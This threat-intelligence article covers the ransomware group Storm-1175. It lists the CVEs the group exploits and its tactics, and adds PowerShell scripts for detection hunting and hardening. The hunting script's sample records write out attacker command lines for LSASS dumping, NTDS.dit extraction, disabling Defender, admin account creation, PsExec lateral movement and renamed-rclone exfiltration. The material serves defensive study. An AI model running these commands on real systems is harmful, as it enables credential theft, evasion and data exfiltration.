Storm-1175 Launches Rapid-Fire Ransomware Attacks, Exploiting Vulnerabilities Within 24 Hours of Disclosure

The financially motivated cybercriminal group Storm-1175, tracked by Microsoft Threat Intelligence, represents a new wave of high-speed ransomware operators. This threat actor specializes in exploiting N-day vulnerabilities—security flaws that are publicly disclosed but not yet widely patched—targeting web-facing systems during the critical exposure window.

Their operations are notable for rapid execution, often progressing from initial access to ransomware deployment within 24 hours to a few days, making them one of the fastest-moving ransomware actors observed in recent years.

Figure: Complete attack chain (source: Microsoft)

Attack Strategy: Speed and Precision

Storm-1175’s success lies in its ability to quickly weaponize vulnerabilities after disclosure. Since 2023, the group has exploited over 16 vulnerabilities, including:

  • CVE-2023-21529 (Microsoft Exchange)
  • CVE-2023-27351, CVE-2023-27350 (Papercut)
  • CVE-2023-46805, CVE-2024-21887 (Ivanti Connect Secure)
  • CVE-2024-1709, CVE-2024-1708 (ConnectWise ScreenConnect)
  • CVE-2024-27198, CVE-2024-27199 (JetBrains TeamCity)
  • CVE-2025-31161 (CrushFTP)
  • CVE-2025-10035 (GoAnywhere MFT)
  • CVE-2025-52691, CVE-2026-23760 (SmarterMail)
  • CVE-2026-1731 (BeyondTrust)

Notably, the actor has demonstrated zero-day capabilities, exploiting vulnerabilities like CVE-2026-23760 before public disclosure.


Attack and Exploitation Techniques

Tactic: Initial access
Observed activity: Storm-1175 exploits vulnerable web-facing applications
Tools and techniques:
  – Ransomware-linked threat actor detected
  – Possible BeyondTrust software vulnerability exploitation
  – Possible exploitation of GoAnywhere MFT vulnerability
  – Possible SAP NetWeaver vulnerability exploitation
  – Possible exploitation of JetBrains TeamCity vulnerability
  – Suspicious command execution via ScreenConnect
  – Suspicious service launched

Tactic: Persistence and privilege escalation
Observed activity: Storm-1175 creates new user accounts under administrative groups using the net command
Tools and techniques:
  – User account created under suspicious circumstances
  – New local admin added using Net commands
  – New group added suspiciously
  – Suspicious account creation
  – Suspicious Windows account manipulation
  – Anomalous account lookups

Tactic: Credential theft
Observed activity: Storm-1175 dumps credentials from LSASS, or uses a privileged position on the Domain Controller to access NTDS.dit and the SAM hive
Tools and techniques:
  – Behavior:Win32/SAMDumpz
  – Exposed credentials at risk of compromise
  – Compromised account credentials
  – Process memory dump

Tactic: Persistence, lateral movement
Observed activity: Storm-1175 uses RMM tools for persistence, payload delivery, and lateral movement
Tools and techniques:
  – Suspicious Atera activity
  – File dropped and launched from remote location

Tactic: Execution
Observed activity: Storm-1175 delivers tools such as PsExec or leverages LOLBins like PowerShell to carry out post-compromise activity
Tools and techniques:
  – Behavior:Win32/PsexecRemote
  – Hands-on-keyboard attack involving multiple devices
  – Remote access software
  – Suspicious PowerShell command line
  – Suspicious PowerShell download or encoded command execution
  – Ransomware-linked threat actor detected

Tactic: Exfiltration
Observed activity: Storm-1175 uses the sync tool Rclone to steal documents
Tools and techniques:
  – Potential human-operated malicious activity
  – Renaming of legitimate tools for possible data exfiltration
  – Possible data exfiltration
  – Hidden dual-use tool launch attempt

Tactic: Defense evasion
Observed activity: Storm-1175 disables Windows Defender
Tools and techniques:
  – Defender detection bypass
  – Attempt to turn off Microsoft Defender Antivirus protection

Tactic: Impact
Observed activity: Storm-1175 deploys Medusa ransomware
Tools and techniques:
  – Ransom:Win32/Medusa
  – Possible ransomware activity based on a known malicious extension
  – Possible compromised user account delivering ransomware-related files
  – Potentially compromised assets exhibiting ransomware-like behavior
  – Ransomware behavior detected in the file system
  – File dropped and launched from remote location
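The behaviours in the table above map almost one-to-one onto process-creation telemetry, so they can be prototyped as hunting rules before they are pushed into a SIEM or Defender advanced hunting. The script below is an added example, not code from the article or from Microsoft: it encodes the net-command account creation, LSASS and NTDS.dit access, Defender tampering, renamed Rclone and PsExec behaviours as rules and runs them over constructed sample records. The record fields (Device, Parent, FileName, OriginalFileName, CommandLine), the rule names and the sample command lines are this example's own assumptions; map the fields to Security event 4688, Sysmon event 1 or the DeviceProcessEvents table when running against real data.

```powershell
# Constructed process-creation records (invented for this demo, not real telemetry).
$SampleEvents = @(
    [pscustomobject]@{ Device='WEB01'; Parent='w3wp.exe';     FileName='cmd.exe';        OriginalFileName='Cmd.Exe';        CommandLine='cmd.exe /c whoami' }
    [pscustomobject]@{ Device='WEB01'; Parent='cmd.exe';      FileName='net.exe';        OriginalFileName='net.exe';        CommandLine='net user svc_backup Sample#Pass1 /add' }
    [pscustomobject]@{ Device='WEB01'; Parent='cmd.exe';      FileName='net.exe';        OriginalFileName='net.exe';        CommandLine='net localgroup administrators svc_backup /add' }
    [pscustomobject]@{ Device='WEB01'; Parent='cmd.exe';      FileName='rundll32.exe';   OriginalFileName='RUNDLL32.EXE';   CommandLine='rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 720 C:\temp\l.dmp full' }
    [pscustomobject]@{ Device='DC01';  Parent='cmd.exe';      FileName='ntdsutil.exe';   OriginalFileName='ntdsutil.exe';   CommandLine='ntdsutil "ac i ntds" ifm "create full C:\temp\ifm" q q' }
    [pscustomobject]@{ Device='WEB01'; Parent='cmd.exe';      FileName='powershell.exe'; OriginalFileName='PowerShell.EXE'; CommandLine='powershell -ep bypass -c "Set-MpPreference -DisableRealtimeMonitoring $true"' }
    [pscustomobject]@{ Device='FS01';  Parent='cmd.exe';      FileName='svchost.exe';    OriginalFileName='rclone.exe';     CommandLine='svchost.exe copy C:\Shares\Finance remote:bkt/finance --transfers 32' }
    [pscustomobject]@{ Device='WEB01'; Parent='cmd.exe';      FileName='PsExec64.exe';   OriginalFileName='psexec.c';       CommandLine='PsExec64.exe \\FS01 -s -d cmd.exe /c C:\temp\run.bat' }
    [pscustomobject]@{ Device='FS01';  Parent='explorer.exe'; FileName='notepad.exe';    OriginalFileName='NOTEPAD.EXE';    CommandLine='notepad.exe C:\Users\bob\notes.txt' }
)

# One rule per observed behaviour. -match is case-insensitive in PowerShell by default.
# Parent process names for the web-shell rule are an assumption; extend them for your stack.
$Rules = @(
    @{ Tactic='Initial access';       Name='Web server or RMM process spawned a shell'
       Test={ param($e) $e.Parent -match '^(w3wp|httpd|tomcat\d*|java|ScreenConnect\.\w+)\.exe$' -and $e.FileName -match '^(cmd|powershell|pwsh)\.exe$' } }
    @{ Tactic='Persistence';          Name='Local account created with net'
       Test={ param($e) $e.CommandLine -match '\bnet1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b' } }
    @{ Tactic='Privilege escalation'; Name='Account added to local Administrators with net'
       Test={ param($e) $e.CommandLine -match '\bnet1?(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b' } }
    @{ Tactic='Credential theft';     Name='LSASS memory dump (comsvcs MiniDump / procdump)'
       Test={ param($e) $e.CommandLine -match 'comsvcs\.dll\s*,\s*MiniDump|procdump.*\blsass' } }
    @{ Tactic='Credential theft';     Name='NTDS.dit extraction with ntdsutil IFM'
       Test={ param($e) $e.CommandLine -match '\bntdsutil\b.*\bifm\b' } }
    @{ Tactic='Defense evasion';      Name='Defender protection disabled via Set-MpPreference'
       Test={ param($e) $e.CommandLine -match 'Set-MpPreference\s+.*-Disable\w+\s+\$?true' } }
    @{ Tactic='Exfiltration';         Name='Renamed rclone binary (PE OriginalFileName mismatch)'
       Test={ param($e) $e.OriginalFileName -eq 'rclone.exe' -and $e.FileName -ne 'rclone.exe' } }
    @{ Tactic='Execution';            Name='PsExec launched against a remote host'
       Test={ param($e) $e.CommandLine -match '\bpsexec(64)?(\.exe)?\s+\\\\\S+' } }
)

function Invoke-Storm1175Hunt {
    # Evaluate every rule against every record; emit one object per hit.
    param([object[]]$Events, [hashtable[]]$Rules)
    foreach ($e in $Events) {
        foreach ($r in $Rules) {
            if (& $r.Test $e) {
                [pscustomobject]@{ Device=$e.Device; Tactic=$r.Tactic; Rule=$r.Name; CommandLine=$e.CommandLine }
            }
        }
    }
}

$Hits = Invoke-Storm1175Hunt -Events $SampleEvents -Rules $Rules
$Hits | Format-Table -AutoSize -Wrap

# Storm-1175 chains these steps within a day, so a device with hits across several
# tactics is the one to contain first; the benign notepad record produces no hit.
$Hits | Group-Object Device | ForEach-Object {
    $tactics = $_.Group.Tactic | Sort-Object -Unique
    if ($tactics.Count -ge 3) {
        '{0}: {1} distinct tactics ({2}) - contain and escalate' -f $_.Name, $tactics.Count, ($tactics -join ', ')
    }
}
```

The renamed-Rclone rule is the one worth copying: the command line of a renamed binary is unpredictable, but the OriginalFileName field in the PE version resource survives the rename and is exposed by Sysmon and Defender, which is what the "Renaming of legitimate tools" alert above relies on.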

Mitigation Strategies

Organizations can defend against Storm-1175 by implementing:

1. Attack Surface Reduction

  • Use external attack surface management tools
  • Isolate web-facing systems behind WAF or VPN

2. Credential Protection

  • Enable Credential Guard
  • Limit local administrator privileges

3. Endpoint Security

  • Enable tamper protection
  • Create attack surface reduction rules to:
    • Block LSASS credential theft
    • Block web shell creation
    • Block PsExec/WMI lateral movement

4. Monitoring and Response

  • Enable automatic attack disruption
  • Monitor for unauthorized RMM tools
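The endpoint, credential and monitoring items above can be applied and verified from a single elevated PowerShell session. The script below is an added example, not code from the article or from Microsoft: it turns on the three named attack surface reduction rules (in audit mode first), sets the Credential Guard policy values, and reports tamper protection, Credential Guard, local Administrators membership and installed RMM services. The rule GUIDs are taken from Microsoft's public ASR rules reference and should be confirmed against current documentation; the function names, the approved-RMM list and the RMM name pattern are this example's own choices.

```powershell
# ASR rule GUIDs from Microsoft's attack surface reduction rules reference (verify before use).
$AsrRules = @{
    '9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2' = 'Block credential stealing from LSASS'
    'a8f5898e-1dc8-49a9-9878-85004b8a61e6' = 'Block Webshell creation for Servers'
    'd1e49aac-8f56-4280-b9ba-993a6d77406c' = 'Block process creations from PsExec and WMI commands'
}

function Enable-Storm1175AsrRules {
    # Roll out in AuditMode first, review the audit events, then switch to Enabled.
    param([ValidateSet('AuditMode', 'Enabled')][string]$Mode = 'AuditMode')
    foreach ($id in $AsrRules.Keys) {
        # Add-MpPreference merges with rules already configured; Set-MpPreference would replace the list.
        Add-MpPreference -AttackSurfaceReductionRules_Ids $id -AttackSurfaceReductionRules_Actions $Mode
        '{0,-9} {1}' -f $Mode, $AsrRules[$id]
    }
}

function Enable-CredentialGuardPolicy {
    # Registry equivalent of the "Turn On Virtualization Based Security" policy.
    # LsaCfgFlags 1 = enabled with UEFI lock, 2 = enabled without lock. Takes effect after reboot.
    $dg = 'HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard'
    New-ItemProperty -Path $dg -Name 'EnableVirtualizationBasedSecurity' -PropertyType DWord -Value 1 -Force | Out-Null
    New-ItemProperty -Path $dg -Name 'RequirePlatformSecurityFeatures' -PropertyType DWord -Value 1 -Force | Out-Null
    New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -Name 'LsaCfgFlags' -PropertyType DWord -Value 1 -Force | Out-Null
    'Credential Guard policy set; reboot required'
}

function Get-Storm1175HardeningStatus {
    param([string[]]$ApprovedRmm = @())   # display names of RMM products your organisation actually uses
    $pref   = Get-MpPreference
    $status = Get-MpComputerStatus

    # Get-MpPreference returns parallel arrays: index i of _Ids pairs with index i of _Actions
    # (0 Disabled, 1 Block, 2 Audit, 6 Warn).
    $action = @{ 0 = 'Disabled'; 1 = 'Block'; 2 = 'Audit'; 6 = 'Warn' }
    $configured = @{}
    for ($i = 0; $i -lt @($pref.AttackSurfaceReductionRules_Ids).Count; $i++) {
        $configured[$pref.AttackSurfaceReductionRules_Ids[$i]] = $action[[int]$pref.AttackSurfaceReductionRules_Actions[$i]]
    }
    foreach ($id in $AsrRules.Keys) {
        $state = if ($configured.ContainsKey($id)) { $configured[$id] } else { 'Not configured' }
        [pscustomobject]@{ Control = "ASR: $($AsrRules[$id])"; State = $state }
    }

    # Tamper protection cannot be set from Set-MpPreference; it is managed centrally, so only report it.
    [pscustomobject]@{ Control = 'Tamper protection'; State = $status.IsTamperProtected }

    # Credential Guard is running when SecurityServicesRunning contains 1.
    $dg = Get-CimInstance -Namespace root\Microsoft\Windows\DeviceGuard -ClassName Win32_DeviceGuard
    [pscustomobject]@{ Control = 'Credential Guard running'; State = ($dg.SecurityServicesRunning -contains 1) }

    # Every member of local Administrators is an account worth justifying; Storm-1175 adds its own here.
    $admins = Get-LocalGroupMember -Group 'Administrators' | ForEach-Object { $_.Name }
    [pscustomobject]@{ Control = 'Local Administrators members'; State = ($admins -join '; ') }

    # Installed RMM services not on the approved list. Atera and ScreenConnect are the products
    # named in this article; extend the pattern with the RMM tools seen in your own environment.
    $rmm = Get-Service | Where-Object { $_.DisplayName -match 'Atera|ScreenConnect' }
    if ($ApprovedRmm.Count -gt 0) { $rmm = $rmm | Where-Object { $_.DisplayName -notmatch ($ApprovedRmm -join '|') } }
    [pscustomobject]@{ Control = 'Unapproved RMM services'; State = (($rmm | ForEach-Object DisplayName) -join '; ') }
}

Enable-Storm1175AsrRules -Mode AuditMode
Enable-CredentialGuardPolicy
Get-Storm1175HardeningStatus -ApprovedRmm @('Atera') | Format-Table -AutoSize -Wrap
```

Run the status function again after the reboot: the ASR rows should read Audit (or Block once you switch the mode), Credential Guard should report True, and anything listed under unapproved RMM services deserves a ticket, since the table above shows Atera and ScreenConnect being used for exactly this actor's persistence and lateral movement.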

Our Take:

Storm-1175 represents a critical evolution in ransomware operations, where speed has become the primary weapon. Unlike traditional attackers who rely on persistence over time, this group capitalizes on the gap between vulnerability disclosure and patching, exposing a systemic weakness in enterprise security practices.

Key Observations:

  • Patch latency is the biggest risk: Organizations are still too slow in applying updates, giving attackers a predictable entry window.
  • Living-off-the-land techniques are highly effective: The use of legitimate tools like PowerShell and RMM software makes detection significantly harder.
  • Credential security remains weak: Repeated reliance on LSASS dumping and NTDS extraction shows many networks lack proper identity protection.
  • Zero-day capability raises stakes: Even mature organizations may struggle if attackers gain early exploit access.

Security strategies must shift from reactive patching to proactive exposure management. Continuous attack surface monitoring, strict privilege controls, and automated response systems are no longer optional—they are essential.